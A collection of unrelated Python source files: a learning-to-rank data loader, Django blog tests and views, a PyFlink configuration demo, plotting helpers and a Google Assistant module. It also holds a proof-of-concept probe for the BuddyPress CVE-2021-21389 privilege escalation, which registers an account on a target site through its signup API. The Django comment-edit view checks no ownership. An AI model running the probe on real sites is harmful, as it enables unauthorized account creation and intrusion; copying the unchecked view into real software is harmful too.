self.num_rel_labels = dataset.num_rel_labels
self.num_features = dataset.num_features
self.fold_num = fold_num
self.data_path = data_path
self._data_ready = False
self.store_pickle_after_read = dataset.store_pickle_after_read
self.read_from_pickle = dataset.read_from_pickle
self.feature_normalization = dataset.feature_normalization
self.purge_test_set = dataset.purge_test_set
self._num_nonzero_feat = dataset._num_nonzero_feat
def max_query_size(self):
return np.amax((
self.train.max_query_size(),
self.validation.max_query_size(),
self.test.max_query_size(),
),)
def data_ready(self):
return self._data_ready
def clean_data(self):
del self.train
del self.validation
del self.test
self._data_ready = False
gc.collect()
def _read_file(self, path, feat_map, purge):
'''
Read letor file.
'''
queries = []
cur_docs = []
cur_labels = []
current_qid = None
for line in open(path, 'r'):
info = line[:line.find('#')].split()
qid = info[1].split(':')[1]
label = int(info[0])
feat_pairs = info[2:]
if current_qid is None:
current_qid = qid
elif current_qid != qid:
stacked_documents = np.stack(cur_docs, axis=0)
if self.feature_normalization:
stacked_documents -= np.amin(stacked_documents, axis=0)[None, :]
safe_max = np.amax(stacked_documents, axis=0)
safe_max[safe_max == 0] = 1.
stacked_documents /= safe_max[None, :]
np_labels = np.array(cur_labels, dtype=np.int64)
if not purge or np.any(np.greater(np_labels, 0)):
queries.append(
{
'qid': current_qid,
'n_docs': stacked_documents.shape[0],
'labels': np_labels,
'documents': stacked_documents
}
)
current_qid = qid
cur_docs = []
cur_labels = []
doc_feat = np.zeros(self._num_nonzero_feat)
for pair in feat_pairs:
feat_id, feature = pair.split(':')
feat_id = int(feat_id)
feat_value = float(feature)
if feat_id not in feat_map:
feat_map[feat_id] = len(feat_map)
assert feat_map[feat_id] < self._num_nonzero_feat, '%s features found but %s expected' % (feat_map[feat_id], self._num_nonzero_feat)
doc_feat[feat_map[feat_id]] = feat_value
cur_docs.append(doc_feat)
cur_labels.append(label)
all_docs = np.concatenate([x['documents'] for x in queries], axis=0)
all_n_docs = np.array([x['n_docs'] for x in queries], dtype=np.int64)
all_labels = np.concatenate([x['labels'] for x in queries], axis=0)
query_ranges = _add_zero_to_vector(np.cumsum(all_n_docs))
return query_ranges, all_docs, all_labels
def _create_feature_mapping(self, feature_dict):
total_features = 0
feature_map = {}
for fid in feature_dict:
if fid not in feature_map:
feature_map[fid] = total_features
total_features += 1
return feature_map
def _normalize_feat(self, query_ranges, feature_matrix):
non_zero_feat = np.zeros(feature_matrix.shape[1], dtype=bool)
for qid in range(query_ranges.shape[0]-1):
s_i, e_i = query_ranges[qid:qid+2]
cur_feat = feature_matrix[s_i:e_i,:]
min_q = np.amin(cur_feat, axis=0)
max_q = np.amax(cur_feat, axis=0)
cur_feat -= min_q[None, :]
denom = max_q - min_q
denom[denom == 0.] = 1.
cur_feat /= denom[None, :]
non_zero_feat += np.greater(max_q, min_q)
return non_zero_feat
def read_data(self):
"""
Reads data from a fold folder (letor format).
"""
data_read = False
if self.feature_normalization and self.purge_test_set:
pickle_name = 'binarized_purged_querynorm.npz'
elif self.feature_normalization:
pickle_name = 'binarized_querynorm.npz'
elif self.purge_test_set:
pickle_name = 'binarized_purged.npz'
else:
pickle_name = 'binarized.npz'
pickle_path = self.data_path + pickle_name
train_raw_path = self.data_path + 'train.txt'
valid_raw_path = self.data_path + 'vali.txt'
test_raw_path = self.data_path + 'test.txt'
if self.read_from_pickle and os.path.isfile(pickle_path):
loaded_data = np.load(pickle_path, allow_pickle=True)
if loaded_data['format_version'] == FOLDDATA_WRITE_VERSION:
feature_map = loaded_data['feature_map'].item()
train_feature_matrix = loaded_data['train_feature_matrix']
train_doclist_ranges = loaded_data['train_doclist_ranges']
train_label_vector = loaded_data['train_label_vector']
valid_feature_matrix = loaded_data['valid_feature_matrix']
valid_doclist_ranges = loaded_data['valid_doclist_ranges']
valid_label_vector = loaded_data['valid_label_vector']
test_feature_matrix = loaded_data['test_feature_matrix']
test_doclist_ranges = loaded_data['test_doclist_ranges']
test_label_vector = loaded_data['test_label_vector']
data_read = True
del loaded_data
if not data_read:
feature_map = {}
(train_doclist_ranges,
train_feature_matrix,
train_label_vector) = self._read_file(train_raw_path,
feature_map,
False)
(valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector) = self._read_file(valid_raw_path,
feature_map,
False)
(test_doclist_ranges,
test_feature_matrix,
test_label_vector) = self._read_file(test_raw_path,
feature_map,
self.purge_test_set)
assert len(feature_map) == self._num_nonzero_feat, '%d non-zero features found but %d expected' % (len(feature_map), self._num_nonzero_feat)
if self.feature_normalization:
non_zero_feat = self._normalize_feat(train_doclist_ranges,
train_feature_matrix)
self._normalize_feat(valid_doclist_ranges,
valid_feature_matrix)
self._normalize_feat(test_doclist_ranges,
test_feature_matrix)
list_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
filtered_list_map = [x for i, x in enumerate(list_map) if non_zero_feat[i]]
feature_map = {}
for i, x in enumerate(filtered_list_map):
feature_map[x] = i
train_feature_matrix = train_feature_matrix[:, non_zero_feat]
valid_feature_matrix = valid_feature_matrix[:, non_zero_feat]
test_feature_matrix = test_feature_matrix[:, non_zero_feat]
# sort found features so that feature id ascends
sorted_map = sorted(feature_map.items())
transform_ind = np.array([x[1] for x in sorted_map])
train_feature_matrix = train_feature_matrix[:, transform_ind]
valid_feature_matrix = valid_feature_matrix[:, transform_ind]
test_feature_matrix = test_feature_matrix[:, transform_ind]
feature_map = {}
for i, x in enumerate([x[0] for x in sorted_map]):
feature_map[x] = i
if self.store_pickle_after_read:
np.savez_compressed(pickle_path,
format_version = FOLDDATA_WRITE_VERSION,
feature_map = feature_map,
train_feature_matrix = train_feature_matrix,
train_doclist_ranges = train_doclist_ranges,
train_label_vector = train_label_vector,
valid_feature_matrix = valid_feature_matrix,
valid_doclist_ranges = valid_doclist_ranges,
valid_label_vector = valid_label_vector,
test_feature_matrix = test_feature_matrix,
test_doclist_ranges = test_doclist_ranges,
test_label_vector = test_label_vector,
)
n_feat = len(feature_map)
assert n_feat == self.num_features, '%d features found but %d expected' % (n_feat, self.num_features)
self.inverse_feature_map = feature_map
self.feature_map = [x[0] for x in sorted(feature_map.items(), key=lambda x: x[1])]
self.train = DataFoldSplit(self,
'train',
train_doclist_ranges,
train_feature_matrix,
train_label_vector)
self.validation = DataFoldSplit(self,
'validation',
valid_doclist_ranges,
valid_feature_matrix,
valid_label_vector)
self.test = DataFoldSplit(self,
'test',
test_doclist_ranges,
test_feature_matrix,
test_label_vector)
self._data_ready = True
|
nilq/baby-python
|
python
|
from django.test import TestCase
from django.urls import reverse
from .models import Post
# Create your tests here.
class PostModelTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu', text='yangilik matni')
def test_text_content(self):
post = Post.objects.get(id=1)
expected_object_title = f'{post.title}'
expected_object_text = f'{post.text}'
self.assertEqual(expected_object_title, 'Mavzu')
self.assertEqual(expected_object_text, 'yangilik matni')
class HomePageViewTest(TestCase):
def setUp(self):
Post.objects.create(title='Mavzu 2', text='boshqa yangilik')
def test_views_url_exists_at_proper_location(self):
resp = self.client.get('/')
self.assertEqual(resp.status_code, 200)
def test_view_url_by_name(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
def test_view_uses_correct_template(self):
resp = self.client.get(reverse('home'))
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, 'home.html')
|
nilq/baby-python
|
python
|
from django.shortcuts import render, redirect, get_object_or_404
from .models import BlogPost as blog
from .models import Comment
from .forms import CreateCommentForm, UpdateCommentForm
# Create your views here.
def post_view(request):
qs=blog.objects.all()
context = {
'qs' : qs,
}
return render(request, 'blog/main.html', context)
def detail_blog_view(request, slug):
context = {}
blog_post = get_object_or_404(blog, slug=slug)
comments = Comment.objects.filter(blog=blog_post)
context['blog_post'] = blog_post
context['comments'] = comments
context['visible'] = True
user = request.user
context['user'] = user.username
if not user.is_authenticated:
context['visible'] = False
form = CreateCommentForm(request.POST or None, request.FILES or None)
if form.is_valid():
obj = form.save(commit=False)
obj.blog = blog_post
obj.author = user
obj.save()
form = CreateCommentForm()
context['form'] = form
return render(request, 'blog/detail_blog.html', context)
def update_comment_view(request, id):
com = get_object_or_404(Comment, id=id)
context = {}
form = UpdateCommentForm()
if request.POST:
form = UpdateCommentForm(request.POST or None, request.FILES or None, instance=com)
if form.is_valid():
form.initial = {
"body":request.POST['body']
}
form.save()
return redirect('/blog1/' + com.blog.slug)
else:
form = UpdateCommentForm(
initial={
'body':com.body
}
)
print(com.body)
context['form'] = form
return render(request, "blog/edit_comment.html", context)
|
nilq/baby-python
|
python
|
from pyflink.common import ExecutionMode, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.dataset import ExecutionEnvironment
from pyflink.datastream import StreamExecutionEnvironment, CheckpointingMode, ExternalizedCheckpointCleanup, TimeCharacteristic, RocksDBStateBackend
from pyflink.datastream.connectors import FlinkKafkaConsumer
def demo01():
# 创建一个执行环境,该环境表示程序当前正在执行。如果程序是独立调用的,则方法返回本地执行环境。
# 1:创建一个流处理的执行环境,如果在本地启动则创建本地执行环境,如果在集群启动则创建集群执行环境
env = StreamExecutionEnvironment.get_execution_environment()
# 添加添加到程序的每个用户代码类加载器的类路径中的url列表。路径必须指定一个协议(例如file://),并且可以在所有节点上访问
env.add_classpaths("file://lib")
# 添加将被上传到集群并由作业引用的jar文件列表。 .set_string("pipeline.jars", 'file://' + dir_kafka_sql_connect)
env.add_jars("file://jars")
# 添加python存档文件。该文件将被解压到python UDF worker的工作目录中。
# 目前只支持zip格式,例如zip、jar、whl、egg等
# 会先解压zip -r py_env.zip py_env.zip
env.add_python_archive("py_env.zip")
# 如果python UDF依赖于集群中不存在的特定python版本,则可以使用此方法上传虚拟环境。注意,上传环境中包含的python解释器的路径应该通过该方法指定
env.set_python_executable("py_env.zip/py_env/bin/python")
# con/flink-conf.yaml 添加 python.client.executable: /usr/bin/python3
# or
env.add_python_archive("py_env.zip", "myenv")
env.set_python_executable("myenv/py_env/bin/python")
# the files contained in the archive file can be accessed in UDF
"""
def my_udf():
with open("myenv/py_env/data/data.txt") as f:
...
"""
# 相当于 pip download -d cached_dir -r requirements.txt --no-binary :all:
env.set_python_requirements("requirements.txt", "cached_dir")
# 添加一个python依赖项,它可以是python文件、python包或本地目录。它们将被添加到python UDF工作者的PYTHONPATH中。请确保可以导入这些依赖项。
env.add_python_file("")
# 添加source
#1. add_source
ds = env.add_source(
FlinkKafkaConsumer(
"source_topic",
JsonRowDeserializationSchema.builder().type_info(type_info=Types.ROW([Types.INT(), Types.STRING()])).build(),
{'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'})
)
# 2. from_collection
ds = env.from_collection([1,2,3,], Types.INT())
# 3. 从文件
ds = env.read_text_file("hdfs://host:port/file/path")
# 禁用operator chaining
env.disable_operator_chaining()
"""
Flink 可以非常高效的进行有状态流的计算,通过使用 Flink 内置的 Keyed State 和 Operator State,保存每个算子的状态。
默认情况下,状态是存储在 JVM 的堆内存中,如果系统中某个环节发生了错误,宕机,这个时候所有的状态都会丢失,并且无法恢复,会导致整个系统的数据计算发生错误。
此时就需要 Checkpoint 来保障系统的容错。Checkpoint 过程,就是把算子的状态周期性持久化的过程。
在系统出错后恢复时,就可以从 checkpoint 中恢复每个算子的状态,从上次消费的地方重新开始消费和计算。从而可以做到在高效进行计算的同时还可以保证数据不丢失,只计算一次。
最少一次
AT_LEAST_ONCE
如果假定是传输过程出现问题,而服务器没有收到数据,这样time out之后重传数据。但这可能是返回成功消息的时候出问题,而此时服务器已经收到数据,这样会因为重传而收到多份数据,这就是 at least once
严格一次
EXACTLY_ONCE
最多一次(At-most-once)、最少一次(At-least-once),以及严格一次(Exactly-once)
Checkpoint 必要的两个条件
1. 需要支持重放一定时间范围内数据的数据源,比如:kafka 。
因为容错机制就是在任务失败后自动从最近一次成功的 checkpoint 处恢复任务,此时需要把任务失败前消费的数据再消费一遍。
假设数据源不支持重放,那么数据还未写到存储中就丢了,任务恢复后,就再也无法重新消费这部分丢了的数据了。
2. 需要一个存储来保存持久化的状态,如:Hdfs,本地文件。可以在任务失败后,从存储中恢复 checkpoint 数据。
https://ci.apache.org/projects/flink/flink-docs-release-1.12/dev/stream/state/checkpointing.html
https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html#pyflink.datastream.CheckpointConfig
"""
# 每 300s 做一次 checkpoint
env.enable_checkpointing(300000, CheckpointingMode.AT_LEAST_ONCE)
# MemoryStateBackend FsStateBackend CustomStateBackend
env.set_state_backend(RocksDBStateBackend("file://var/checkpoints/"))
# set mode to exactly-once (this is the default)
env.get_checkpoint_config().set_checkpointing_mode(CheckpointingMode.EXACTLY_ONCE)
# 两次 checkpoint 的间隔时间至少为 500ms,默认是 0,立即进行下一次 checkpoint make sure 500 ms of progress happen between checkpoints
env.get_checkpoint_config().set_min_pause_between_checkpoints(500)
# checkpoint 必须在 60s 内结束,否则被丢弃 checkpoints have to complete within one minute, or are discarded
env.get_checkpoint_config().set_checkpoint_timeout(60000)
# 同一时间只能允许有一个 checkpoint allow only one checkpoint to be in progress at the same time
env.get_checkpoint_config().set_max_concurrent_checkpoints(1)
# 当 Flink 任务取消时,保留外部保存的 checkpoint 信息 enable externalized checkpoints which are retained after job cancellation
env.get_checkpoint_config().enable_externalized_checkpoints(ExternalizedCheckpointCleanup.RETAIN_ON_CANCELLATION)
# 当有较新的 Savepoint 时,作业也会从 Checkpoint 处恢复 allow job recovery fallback to checkpoint when there is a more recent savepoint
env.get_checkpoint_config().set_prefer_checkpoint_for_recovery(True)
# 允许实验性的功能:非对齐的 checkpoint,以提升性能 enables the experimental unaligned checkpoints
# CheckpointingMode.EXACTLY_ONCE时才能启用
env.get_checkpoint_config().enable_unaligned_checkpoints()
# env.get_checkpoint_config().disable_unaligned_checkpoints() 等同env.get_checkpoint_config().enable_unaligned_checkpoints(False)
env.get_checkpoint_interval() #等同 env.get_checkpoint_config().get_checkpoint_interval()
"""
"""
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.common.html#pyflink.common.ExecutionConfig
# bin/flink run -Dexecution.runtime-mode=BATCH examples/streaming/WordCount.jar
env.get_config().set_execution_mode(ExecutionMode.BATCH)
env.get_config().disable_auto_generated_uids()# enable_auto_generated_uids
# 自己设置uid
ds.uid("xx")
# 设置从此环境创建的所有流的时间特性,例如,处理时间、事件时间或摄取时间。
# 如果将特征设置为EventTime的incertiontime,则将设置默认值水印更新间隔为200毫秒。
env.set_stream_time_characteristic(TimeCharacteristic.EventTime) #设置时间分配器
env.get_config().set_auto_watermark_interval(200) # 每200ms发出一个watermark
env.get_config().set_global_job_parameters({"environment.checkpoint_interval": "1000"})
env.get_config().set_restart_strategy(RestartStrategies.fixed_delay_restart(10, 1000))
# 执行
env.execute("job name")
# 异步执行
jobClient = env.execute_async("job name")
jobClient.get_job_execution_result().result()
"""
设置输出缓冲区刷新的最大时间频率(毫秒)。默认情况下,输出缓冲区会频繁刷新,以提供较低的延迟,并帮助流畅的开发人员体验。设置该参数可以产生三种逻辑模式:
正整数触发该整数周期性刷新
0 触发每个记录之后的刷新,从而最大限度地减少延迟(最好不要设置为0 可以设置一个接近0的数值,比如5或者10)
-1 仅在输出缓冲区已满时才触发刷新,从而最大化吞吐量
"""
# 输出缓冲区刷新的最大时间频率(毫秒)
env.get_buffer_timeout()
env.set_buffer_timeout(10)
# 获取执行计划的json,复制到https://flink.apache.org/visualizer/
env.get_execution_plan()
# https://ci.apache.org/projects/flink/flink-docs-release-1.12/api/python/pyflink.datastream.html
if __name__ == '__main__':
demo01()
|
nilq/baby-python
|
python
|
import sys
import os
from bs4 import BeautifulSoup
import markdown
"""
将 Markdown 转换为 HTML
"""
class MarkdownToHtml:
headTag = '<head><meta charset="utf-8" /></head>'
def __init__(self,cssFilePath = None):
if cssFilePath != None:
self.genStyle(cssFilePath)
def genStyle(self,cssFilePath):
with open(cssFilePath,'r') as f:
cssString = f.read()
self.headTag = self.headTag[:-7] + '<style type="text/css">{}</style>'.format(cssString) + self.headTag[-7:]
def markdownToHtml(self, sourceFilePath, destinationDirectory = None, outputFileName = None):
if not destinationDirectory:
# 未定义输出目录则将源文件目录(注意要转换为绝对路径)作为输出目录
destinationDirectory = os.path.dirname(os.path.abspath(sourceFilePath))
if not outputFileName:
# 未定义输出文件名则沿用输入文件名
outputFileName = os.path.splitext(os.path.basename(sourceFilePath))[0] + '.html'
if destinationDirectory[-1] != '/':
destinationDirectory += '/'
with open(sourceFilePath,'r', encoding='utf8') as f:
markdownText = f.read()
# 编译出原始 HTML 文本
rawHtml = self.headTag + markdown.markdown(markdownText,output_format='html5')
# 格式化 HTML 文本为可读性更强的格式
beautifyHtml = BeautifulSoup(rawHtml,'html5lib').prettify()
with open(destinationDirectory + outputFileName, 'w', encoding='utf8') as f:
f.write(beautifyHtml)
if __name__ == "__main__":
mth = MarkdownToHtml()
# 做一个命令行参数列表的浅拷贝,不包含脚本文件名
argv = sys.argv[1:]
# 目前列表 argv 可能包含源文件路径之外的元素(即选项信息)
# 程序最后遍历列表 argv 进行编译 markdown 时,列表中的元素必须全部是源文件路径
outputDirectory = None
if '-s' in argv:
cssArgIndex = argv.index('-s') +1
cssFilePath = argv[cssArgIndex]
# 检测样式表文件路径是否有效
if not os.path.isfile(cssFilePath):
print('Invalid Path: '+cssFilePath)
sys.exit()
mth.genStyle(cssFilePath)
# pop 顺序不能随意变化
argv.pop(cssArgIndex)
argv.pop(cssArgIndex-1)
if '-o' in argv:
dirArgIndex = argv.index('-o') +1
outputDirectory = argv[dirArgIndex]
# 检测输出目录是否有效
if not os.path.isdir(outputDirectory):
print('Invalid Directory: ' + outputDirectory)
sys.exit()
# pop 顺序不能随意变化
argv.pop(dirArgIndex)
argv.pop(dirArgIndex-1)
# 至此,列表 argv 中的元素均是源文件路径
# 遍历所有源文件路径
for filePath in argv:
# 判断文件路径是否有效
if os.path.isfile(filePath):
mth.markdownToHtml(filePath, outputDirectory)
else:
print('Invalid Path: ' + filePath)
|
nilq/baby-python
|
python
|
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
main_axis = plt.subplot(gs[0])
axes.append(plt.subplot(gs[0]))
axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
"""Returns a single plot figure size in inches given a width in points"""
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from polyclinics.models import Poly
class PolySerializer(serializers.ModelSerializer):
class Meta:
model = Poly
fields = '__all__'
|
nilq/baby-python
|
python
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''BuddyPress REST API Privilege Escalation to RCE''',
"description": '''The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE''',
"severity": "high",
"references": [
"https://github.com/HoangKien1020/CVE-2021-21389",
"https://buddypress.org/2021/03/buddypress-7-2-1-security-release/",
"https://codex.buddypress.org/releases/version-7-2-1/",
"https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-21389",
"cwe-id": "CWE-863"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "wordpress", "wp-plugin", "rce"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/wp-json/buddypress/v1/signup"""
method = "POST"
data = """{
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
}"""
headers = {'Content-Type': 'application/json; charset=UTF-8'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""user_login""" in resp0.text and """registered""" in resp0.text and """activation_key""" in resp0.text and """user_email""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# Copyright (C) 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os.path
from resources.lib.utils import import_or_install, json, PlayerMetaData, PLATFORM, PLAYING_STATES, PLAYING_STATE, LISTENING_STATE, IDLE_STATE, NOTIFY_STATE, ALERT_STATE, SPEAKING_STATE
import threading
import sys
try:
FileNotFoundError
except NameError:
FileNotFoundError = IOError
def setup(monitor):
'''setup the module'''
if not "armv7" in PLATFORM:
LOGGER.warning("unsupported platform! %s" % PLATFORM)
return False
enabled = monitor.config.get("ENABLE_MODULE_GOOGLE_ASSISTANT", False)
if not enabled:
LOGGER.debug("Google Assistant module is not enabled!")
return False
dummy_mic = "Dummy" in monitor.config["ALSA_CAPTURE_DEVICE"]
mute_mic = monitor.config.get("GOOGLE_ASSISTANT_MUTE_MIC", dummy_mic)
import_or_install("pathlib2", "pathlib", installpip="pathlib2")
import_or_install("google.assistant.library", "Assistant", True, installpip="google-assistant-library google-assistant-sdk[samples]", installapt="portaudio19-dev libffi-dev libssl-dev")
import_or_install("google.assistant.library.event", "EventType", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.file_helpers", "existing_file", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.assistant.library.device_helpers", "register_device", True, installpip="google-assistant-sdk[samples]")
import_or_install("google.oauth2.credentials", "Credentials", True, installpip="google-auth-oauthlib[tool]")
model_id="voice-kit-208321-voice-kit-kftedd"
project_id="voice-kit-208321"
client_secrets = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..","resources", "googlecreds.json")
credentialsfile = None
devconfig_file = None
return GoogleAssistantPlayer(credentialsfile, model_id, project_id, devconfig_file, client_secrets, monitor, mute_mic)
class GoogleAssistantPlayer(threading.Thread):
_exit = threading.Event()
_assistant = None
def command(self, cmd, cmd_data=None):
if not self._assistant:
return False
if self.monitor.states["google_assistant"]["state"] == PLAYING_STATE:
if cmd == "pause":
self._assistant.send_text_query("pause")
return True
elif cmd == "stop":
self._assistant.send_text_query("stop")
return True
else:
return False
elif cmd == "broadcast":
self._assistant.send_text_query("broadcast %s" % cmd_data)
return True
else:
return False
def process_event(self, event):
"""Pretty prints events.
Prints all events that occur with two spaces between each new
conversation and a single space between turns of a conversation.
Args:
event(event.Event): The current event to process.
"""
LOGGER.debug("Google received event: %s" % event)
if event.type == EventType.ON_START_FINISHED:
LOGGER.info("Google Assistant is now ready for commands (waiting for hotword)")
self._assistant.send_text_query("set volume to 100 percent")
elif event.type in [EventType.ON_CONVERSATION_TURN_STARTED]:
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
self.monitor.command("system", "ping")
LOGGER.info("Google Assistant is now listening for a command (hotword detected)")
elif event.type in [EventType.ON_ALERT_STARTED]:
self.monitor.states["google_assistant"]["state"] = ALERT_STATE
LOGGER.info("Google Assistant is now broadcasting an alert")
elif event.type == EventType.ON_RENDER_RESPONSE:
self.monitor.states["google_assistant"]["title"] = event.args.get("text","")
elif event.type in [EventType.ON_RESPONDING_STARTED]:
self.monitor.states["google_assistant"]["state"] = SPEAKING_STATE
LOGGER.info("Google Assistant is talking a response")
elif event.type in [EventType.ON_MEDIA_TRACK_PLAY]:
self.monitor.states["google_assistant"]["state"] = PLAYING_STATE
LOGGER.info("Google Assistant is playing media")
elif event.type in [EventType.ON_ALERT_FINISHED,
EventType.ON_CONVERSATION_TURN_TIMEOUT,
EventType.ON_RESPONDING_FINISHED,
EventType.ON_MEDIA_TRACK_STOP,
EventType.ON_CONVERSATION_TURN_FINISHED]:
# check for follow-up
if event.type == EventType.ON_CONVERSATION_TURN_FINISHED:
if event.args and event.args['with_follow_on_turn']:
# the mic is listening again for follow-up
self.monitor.states["google_assistant"]["state"] = LISTENING_STATE
return
# return to idle
self.monitor.states["google_assistant"]["state"] = IDLE_STATE
elif event.type == EventType.ON_DEVICE_ACTION:
for command, params in event.actions:
LOGGER.info("Do command %s - with params: %s" % (command, params))
def authenticate_device(self):
import google_auth_oauthlib.flow
scopes = ["https://www.googleapis.com/auth/assistant-sdk-prototype", "https://www.googleapis.com/auth/gcm"]
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
self.client_secrets,
scopes=scopes
)
flow.redirect_uri = flow._OOB_REDIRECT_URI
auth_url, _ = flow.authorization_url()
LOGGER.info("######################################################################################")
LOGGER.info("# Registering Google Assistant #")
LOGGER.info('# Please visit the url below in your browser and #')
LOGGER.info('# paste the resulting code in the web configuration #')
LOGGER.info('# There will be a new setting added, called "GOOGLE ASSISTANT AUTH CODE" #')
LOGGER.info('# #')
LOGGER.info(' ')
LOGGER.info(' %s' % auth_url)
LOGGER.info(' ')
LOGGER.info("######################################################################################")
self.monitor.states["messages"].append("Google Assistant needs to be registered. See the log for details.")
code = None
while not code and not self._exit.is_set():
code = self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"]
if code:
flow.fetch_token(code=code)
LOGGER.info("Device is registered succesfully!")
self.monitor.config["GOOGLE_ASSISTANT_AUTH_CODE"] = ""
creds = flow.credentials
creds_data = {
'token': creds.token,
'refresh_token': creds.refresh_token,
'token_uri': creds.token_uri,
'client_id': creds.client_id,
'client_secret': creds.client_secret,
'scopes': creds.scopes
}
del creds_data['token']
config_path = os.path.dirname(self.credentialsfile)
if not os.path.isdir(config_path):
os.makedirs(config_path)
with open(self.credentialsfile, 'w') as outfile:
json.dump(creds_data, outfile)
LOGGER.debug("Credentials saved to %s" % self.credentialsfile)
def __init__(self, credentialsfile=None, model_id=None, project_id=None, devconfig_file=None, client_secrets=None, monitor=None, mic_muted=False):
if not credentialsfile:
credentialsfile = os.path.join(os.path.expanduser('~/.config'), 'google-oauthlib-tool','credentials.json')
self.credentialsfile = credentialsfile
if not devconfig_file:
devconfig_file = os.path.join(os.path.expanduser('~/.config'), 'googlesamples-assistant','device_config_library.json')
device_model_id = None
last_device_id = None
try:
with open(devconfig_file) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
LOGGER.warning("device config file not found")
if not model_id and not device_model_id:
raise Exception('Missing --device-model-id option')
# Re-register if "device_model_id" is given by the user and it differs
# from what we previously registered with.
should_register = (
model_id and model_id != device_model_id)
self.device_model_id = model_id or device_model_id
self.devconfig_file = devconfig_file
self.last_device_id = last_device_id
self.project_id = project_id
self.should_register = should_register
self.mic_muted = mic_muted
self.monitor = monitor
self.client_secrets = client_secrets
if monitor:
self.monitor.states["google_assistant"] = PlayerMetaData("Google Assistant")
threading.Thread.__init__(self)
def stop(self):
self._exit.set()
if self._assistant:
self._assistant.send_text_query("exit")
threading.Thread.join(self, 2)
def run(self):
if not os.path.isfile(self.credentialsfile):
# we should authenticate
self.authenticate_device()
if not os.path.isfile(self.credentialsfile):
return
with open(self.credentialsfile, 'r') as f:
self.credentials = Credentials(token=None, **json.load(f))
with Assistant(self.credentials, self.device_model_id) as assistant:
events = assistant.start()
assistant.set_mic_mute(self.mic_muted)
device_id = assistant.device_id
LOGGER.info('device_model_id: %s' % self.device_model_id)
LOGGER.info('device_id: %s' % device_id)
self._assistant = assistant
# Re-register if "device_id" is different from the last "device_id":
if self.should_register or (device_id != self.last_device_id):
if self.project_id:
